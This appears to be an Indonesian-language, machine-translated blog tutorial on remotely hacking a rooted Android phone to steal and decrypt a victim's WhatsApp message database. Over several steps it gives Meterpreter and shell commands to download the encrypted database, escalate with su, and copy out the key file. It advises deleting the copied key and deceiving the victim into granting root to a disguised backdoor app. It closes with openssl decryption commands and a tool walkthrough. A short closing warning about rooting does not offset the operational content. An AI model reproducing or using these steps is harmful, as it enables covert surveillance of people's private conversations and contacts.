Breaking News

Meretas dan Mendekripsi Database WhatsApp (Remotely) [ROOT]


Tutorial ini akan menjelaskan cara mengekstrak dan mendekripsi basis data WhatsApp dari sistem android Victim.

Ya perangkat harus di-root, tidak ada jalan memutar untuk melakukan ini dari jarak jauh. Saya telah mendapatkan PM tentang hal ini dan tidak bisa menjawab dengan kata SPOOF.

Ada apa?
Hampir semua orang tahu tentang itu. Ini adalah aplikasi android sosial, yang memungkinkan pengguna untuk mengirim pesan gratis melalui internet dalam hitungan detik. Para pengembang telah membuat sukses besar dan memiliki algoritma tingkat tinggi dan kompleks untuk mengenkripsi dan menyimpan data, yang berubah dengan setiap pembaruan! Dan karenanya setiap orang menggunakannya untuk mengirim pesan yang paling banyak personil karena mereka tahu itu aman.

Tapi benarkah itu?

Ya sebenarnya sangat aman, namun jika Korban itu bodoh atau mudah tertipu, dia adalah kerentanan utama di sini. Saya melihat banyak pengguna 'yang berpengalaman' membasmi android mereka untuk menjelajahi / mendorong ke batas maksimum sistem. Mengikuti jejak mereka, 'pengguna yang tidak berpengalaman' juga melakukan root / brick android mereka hanya untuk menyelesaikan tugas kecil. Mereka bahkan tidak peduli dengan Cons.

Bagaimanapun, mari jalankan peretasan:

Langkah 1 ( Eksploitasi dan Dapatkan Akses ke Android! )
Ini bagian yang mudah yang Anda semua suka dan terbiasa.
Setelah di meterpreter, ketik check_root untuk memastikan perangkat di-root.
Apa yang kita butuhkan?
Untuk mendekripsi database, kita membutuhkan database itu sendiri jelas dan file kunci dalam folder / data, yang kita perlukan root untuk mengakses lokasi. Kami tidak dapat mendekripsi database tanpa kunci (Sampai Anda ingin menghabiskan lebih dari 100 tahun bahkan dengan mainframe!)

Langkah 2 ( Mari Memulai Proses Ekstraksi untuk Basis Data: )
Dalam jenis meterpreter:


  • cd /
  • cd / sdcard / WhatsApp
  • ls (Cetak direktori saat ini)

  • cd Database
  • download msgstore.db.crypt8 (Ini akan memakan waktu, mungkin BANYAK)
Jadi, database sudah diunduh, sekarang kita perlu 'Key of Decryption'
(File kunci yang menahan kunci enkripsi tidak dapat diambil lagi kecuali ponsel Anda di-root)

Langkah 3  ( Drop ke dalam Shell: )
Seperti yang diceritakan sebelumnya, tetapi menambahkan sedikit lebih detail di sini:

Untuk mendekripsi file crypt8, kita akan membutuhkan file kunci. File kunci menyimpan dua set kunci dekripsi - kunci enkripsi aktual, K dan vektor inisialisasi yang disebut IV. WhatsApp menyimpan file kunci di lokasi yang aman.

Mengekstrak file kunci, ketik:

  • shell
  • su (Untuk akses Pengguna Super atau hanya meningkatkan hak istimewa)
Di sinilah bagian yang sulit, jika target berpengalaman dan terampil, ia harus menginstal aplikasi SuperSU.

Aplikasi ini bertanggung jawab untuk memegang izin apakah aplikasi dapat memiliki akses ke root. Ia bahkan menyimpan semua log.

Jadi, kita perlu meyakinkan korban bahwa aplikasi ini untuk meningkatkan (atau alasan lain) sistem androidnya tetapi pada saat yang sama membutuhkan akses root untuk mencapai potensi maksimalnya. Berikut ini adalah tutorial yang sangat baik oleh bart yang menunjukkan cara menyamarkan aplikasi back-door.

Ada beberapa kasus dengan pengguna yang tidak berpengalaman dan tidak mahir:

  • Mereka tidak memiliki aplikasi SuperSU yang diinstal.
  • Mereka belum mengubah pengaturan untuk aplikasi yang baru dipasang ke PROMPT, bukan GRANT.
Jadi dalam kasus ini kita benar-benar beruntung!
Ayo lanjutkan:
(Jika android tidak di-root, Anda dapat menavigasi, tetapi tidak menyalin atau mencetak direktori)

  • cd /
  • cd / data / data
  • ls
  • cd com.whatsapp
  • ls
  • cd files
  • ls
  • cp key / sdcard / Download

(Berarti menyalin file 'kunci' ke sdcard> Unduh folder)

Hentikan shell:
^ C (Kontrol + C)

Kunci telah diekstrak dari / data ke / sdcard dengan sukses!

Langkah 4 ( Akan ke Meterpreter: )
Mari unduh file kunci yang diekstrak ke direktori root kita seperti yang kita lakukan untuk database terenkripsi, ketik:

  • cd /
  • cd /sdcard/Download
  • download key
  • rm key
rm key (Pastikan Anda melakukan itu untuk menghapus file kunci)

Kunci telah berhasil diekstrak ke direktori root kami!

Langkah 5 ( DECRYPT DATABASE! )
Sekarang kita memiliki database dan kuncinya, kita dapat dengan mudah mendekripsi dengan salah satu dari dua metode:

# 1 Dengan Perintah Linux Sederhana:
Dengan dua kebutuhan dalam direktori root, buka terminal dan ketik:
(Salin dan Tempelkan perintah one at a time, jangan membuat skrip dari itu, atau tidak akan berfungsi)

  • hexdump -e '2/1 "%02x"' key | cut -b 253-316 > aes.txt
  • hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134 > iv.txt
  • dd if=msgstore.db.crypt8 of=msgstore.db.crypt8.nohdr ibs=67 skip=1
  • openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $(cat aes.txt) -iv $(cat iv.txt) > msgstore.gz
  • gzip -cdq msgstore.gz > msgstore.db
Jika Anda bahkan sedikit bash, maka Anda dapat dengan mudah memahami perintah-perintah ini. (Sumber: di sini)

Jika perintah ke-4 tidak berfungsi, ikuti:

  • hexdump -e '2/1 "%02x"' key | cut -b 253-316
(Salin teks tercetak)

  • hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134
(Salin teks tercetak)

  • openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K (Tempel teks dari perintah pertama) -iv (Tempel teks dari perintah ke-2)> msgstore.gz
Perintah-perintah ini memiliki bug / kesalahan dalam hasil, jadi saya akan sangat menyarankan untuk menggunakan metode # 2.

# 2 Dengan Aplikasi Simple Windows WhatsApp Viewer:
Aplikasi ini memiliki antarmuka yang sangat baik, dari GitHub. Unduh aplikasinya dari sana.

Juga, salin kunci dan basis data ke windows, saya harap Anda tahu cara melakukannya.

  • Buka aplikasi (di windows tentu saja).
  • Klik FIle, lalu pada 'Decrypt .crypt8'
  • Di kotak dialog yang muncul, berikan file Key dan Database.
Klik OK, Anda akan melihat bahwa file 'msgstore.decrypted' telah muncul di desktop Anda.
  • Buka menggunakan aplikasi yang sama, buka 'File' lalu 'Buka'.
  • Berikan file yang didekripsi, biarkan nama Akun kosong dan untuk 'wa.db', Anda dapat meretas ponsel lagi untuk mengekstrak .db ini, untuk menyelesaikan nama kontak seperti yang disebutkan dalam screenshot yang dipotong di bawah ini.


  • Klik 'OK'
Dan 'Boom' semua kontak dengan semua obrolan bahkan yang terbaru menunggu Klik Anda
Tutorial Berakhir:
Sekarang Anda tahu betapa berbahayanya Rooting sebenarnya, harap berhati-hatilah.

Seorang cracker tidak hanya dapat melakukan hack sederhana ini, ia bahkan dapat mengekstrak semua kata sandi Wi-Fi yang tersimpan di android Anda, ia dapat mengakses semuanya, hal-hal yang bahkan Anda tidak memiliki aksesnya !! Dia dapat menyebar ke PC Anda setelah Anda menghubungkan android Anda, meretas akun Anda (kata sandi yang disimpan) dan bahkan membingkai Anda. Anda hanya menjadi pion belaka untuk rencana selanjutnya.

Jadi, pikirkan dua kali sebelum melakukan rooting dan berhati-hatilah, sambil memegang Android yang di-rooting di tangan Anda.

Terima kasih!
Please comment 

No comments